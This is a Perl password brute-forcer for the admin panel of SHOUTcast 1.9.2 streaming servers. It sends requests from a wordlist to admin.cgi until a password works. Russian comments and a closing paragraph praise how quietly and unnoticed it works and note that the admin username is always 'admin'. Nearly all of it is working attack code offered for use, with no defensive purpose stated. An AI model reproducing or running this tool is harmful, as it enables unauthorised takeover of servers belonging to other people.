
#!/usr/bin/perl
# SHOUTcast 1.9.2 (and maybe others) bruteforcer
#
use Socket;
$host = "radio.changeme.net"; # Url SHOUTcast-сервера
$port = 8000; # порт, на котором висит сервер
$word = "wordlist.txt"; # словарик для брутфорса
$check = "200 OK";
open(WRDS,"$word");
until( eof(*WRDS) ){
$pwd = readline(*WRDS);
chomp $pwd;
$sndstr= "GET /admin.cgi?pass=";
$sndstr.= $pwd;
$sndstr.=" HTTP\x2f1.0\r\nUser-Agent\x3a Mozilla 4.5(Compatible)\r\n\r\n\r\n";
socket(C, AF_INET, SOCK_STREAM, 0) || die "cant call socket()!";
connect(C, sockaddr_in( $port, inet_aton($host))) || die "cant connect!";
send(C, $sndstr, length($sndstr) );
do
{
if ($_ =~ m/$check/i){
print " DJs PASSWORD IS : $pwd\n";
close(WRDS);
exit;
}
} while (<C>);
}
Брутфорс реализован на Перле. Его алгоритм прост, как все гениальное: он коннектится к серверу и тихонечко и незаметно начинает подбирать пароль. Если один из паролей, записанных у тебя в wordlist.txt, подойдет, программа выведет его на экран и закончит свою работу.
Самое забавное, что User name админа всегда admin.
|